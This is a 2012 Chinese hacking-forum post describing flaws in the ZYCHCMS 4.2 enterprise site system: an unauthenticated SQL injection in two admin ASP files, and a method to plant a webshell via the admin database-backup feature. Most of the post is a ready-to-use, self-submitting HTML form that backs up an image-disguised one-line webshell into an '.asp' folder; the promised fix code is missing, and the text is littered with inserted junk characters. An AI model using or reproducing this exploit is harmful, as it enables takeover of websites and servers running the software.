中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

- G% k# n( m  V8 e$ E- K) H2 M! g+ O8 g

' N9 i! V: O: ~- v# o8 d: |0 J: N) ]7 ~0 S4 t" C) h
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
8 ~5 K: T/ b, d- h7 v ①SQL注射漏洞
& X4 a1 {9 [& r3 z' [; H. U! b 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp! `7 R! J4 Z7 Y3 `
漏洞原因:未过滤1 {8 k: F5 S4 `
漏洞代码:- z. q* P, @7 F+ T4 v5 @+ y* ~9 k7 Q
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。( Y, N2 x8 M! p  y$ B% x5 ?
修复方法:在文件开头加入代码
, J5 F" D7 V5 w0 t7 h
$ R8 A7 N, X, _4 |6 u% s& X8 B( \  W2 v) n! H8 P) N
②后台拿WBSHELL7 Q! W# X! G0 H  ~- R/ `% U& p
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。+ [; [  t+ D4 r- ~4 a5 g* c3 m
这里在网上找了一个,改了下,将就着用。5 m5 i( v' S  q! q; y7 D# J' ?# D
以下是代码本地提交代码( @: O1 c4 Z# z1 ]

0 a# }6 `5 s. M, M! T
* o0 }' @- ~& h) n) u<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
) L8 a, f7 h, N4 V  f% e. ^( `2 u <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–># k- T8 l8 w5 O+ r# a* Q- B
<tr>( q4 i+ b$ i/ O0 y
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
8 O  q3 [% @8 t$ p$ B' o </tr>
# [0 Z% C# x1 K$ R" O& D <tr>4 h1 l2 G( J5 J# o
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>7 C" C* z* Z6 U
</span>
& H5 u. K0 ]+ y7 l; O- @& Z <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >+ d, x. |3 Z9 r8 Z. _
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >8 R9 E% B6 V* a2 ^) \
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>% G9 Y, ^" b* n5 d9 y; l2 D
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
- s) Z; P  F$ a- ~ <div align=”left”>7 W" O' E& F# U2 W/ m% G8 x
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />0 E' {3 t7 R# X# y' d8 `. @
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>) X3 ?, P: _: _+ f+ L* V
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />, P/ y9 g9 W6 k7 o2 |# i
</div></td>
( x. G2 t, Z4 p- Q4 t8 J </tr>% ]  A& i# k# z0 ~1 W1 ?& k1 w. ?
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>( d; b$ x4 o1 w3 c! ?' H
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>, S7 g, L% H3 W$ A1 r1 A5 j( H
<td class=”td”><div align=”left”>( o- t+ J2 b0 n6 K0 s6 M
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
) s7 y; i5 g  L) W. v8 D [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>" ~+ b" x. P, l, r
</tr>" w% E5 J, A+ z! j) @
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>2 _2 _- }# Y( u+ Q  r2 `/ x
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>7 t: E9 L- J! L) h
<td class=”td”><div align=”left”>& @: z4 y- ~. Z4 s
<input type=”submit” value=”确定备份” class=”btn”8 W& f) j! ]1 |. a, Q
</div></td>
6 V- M- ^$ b' e3 `! @, V1 C </tr>
/ Z( h* f: W5 b2 n% R </table></td></tr></form>
: x* a1 }! g# F, Z7 e; {  ] </table>0 c7 v# E8 n9 Z5 g2 n4 J8 S1 N, o
</td>0 e7 Z( b- a& V$ x/ z/ d/ K3 j
</tr>& R7 z2 J+ [( Q3 \3 W, c0 X5 z
</table>) x% J8 r1 w/ g) f/ @) f. g* _. H
<script>
- y- o9 f* S" N9 M document.all.add.submit();0 ]3 T5 j8 N  ]
</script>* \4 q+ }- `9 m3 I: A% [* u2 {$ H

  F# t4 H0 i' [  v5 Y; K/ _$ i# D* C9 M! u$ [; }5 j# g( e7 x$ u7 Q2 I
1 [4 j5 F4 L/ q' B9 g$ o. v
$ s/ k8 V( }1 L3 y2 N9 }& m

9 ?/ x1 |3 m. Y7 h3 S. L' O2 ?8 X- o: l& ~/ L: x
6 h/ G3 d( ~# [# `( ?
0 @$ d; x% `5 V: O+ T
5 d  Y, v$ Q$ S  A6 B# f

# L5 E) u$ `' c3 R




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2